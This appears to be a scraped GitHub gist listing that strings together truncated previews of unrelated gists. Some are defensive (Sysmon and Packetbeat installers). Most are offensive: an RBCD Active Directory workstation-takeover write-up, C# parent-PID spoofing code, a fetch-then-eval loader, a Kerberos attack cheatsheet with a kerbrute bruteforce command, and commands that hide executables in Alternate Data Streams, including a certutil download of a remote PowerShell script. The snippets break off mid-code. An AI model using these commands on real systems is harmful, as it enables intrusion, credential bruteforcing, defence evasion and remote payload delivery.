log4she11

  • 127.0.0.1
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PACKETBEAT_YAML="https://raw.githubusercontent.com/socfortress/Wazuh-Rules/main/Packetbeat/packetbeat.yml"
logger() {
now=$(date +'%m/%d/%Y %H:%M:%S')
case $1 in
"-e")
mtype="ERROR:"

$sysinternals_repo = 'download.sysinternals.com'
$sysinternals_downloadlink = 'https://download.sysinternals.com/files/SysinternalsSuite.zip'
$sysinternals_folder = 'C:\Program Files\sysinternals'
$sysinternals_zip = 'SysinternalsSuite.zip'
$sysmonconfig_downloadlink = 'https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml'
$sysmonconfig_file = 'sysmonconfig-export.xml'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if (Test-Path -Path $sysinternals_folder) {
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active May 28, 2024 22:38
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@jfmaes
jfmaes / pidspoofDinvoke.cs
Last active January 17, 2023 02:28
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
namespace DInvoke_PIDSpoof_DevNuget
{
class Program
{
static void Main(string[] args)

// <script src="https://code.jquery.com/jquery-3.5.0.js"></script>
const loadScript = async (url) => {
  const response = await fetch(url)
  const script = await response.text()
  // Function(script) only constructs the function; it has to be called to run the fetched code
  new Function(script)()
}
const scriptUrl = "https://code.jquery.com/jquery-3.5.0.js"
loadScript(scriptUrl)

// eval variant of the same fetch-then-execute pattern (kept separate: a const
// binding named loadScript cannot be declared twice in the same scope)
const loadScript = async (url) => {
  const response = await fetch(url)
  const script = await response.text()
  eval(script)
}
const scriptUrl = "script.js"
loadScript(scriptUrl)
@X-C3LL
X-C3LL / F-Isolation.py
Created April 9, 2020 16:46
Small script to transfer files between a VDI and host using OCR & Keyboard emulation
#!/usr/bin/python
#coding: utf-8
# F-Isolation v0.1 - F**k isolated environments
# Because we hate the kind of pentests where you start at an isolated Citrix where our
# clipboard is useless, we do not have internet access inside the machine and we cannot
# map a local resource to upload our tools.
# OCR + keyboard emulation FTW!
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 29, 2024 10:31
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab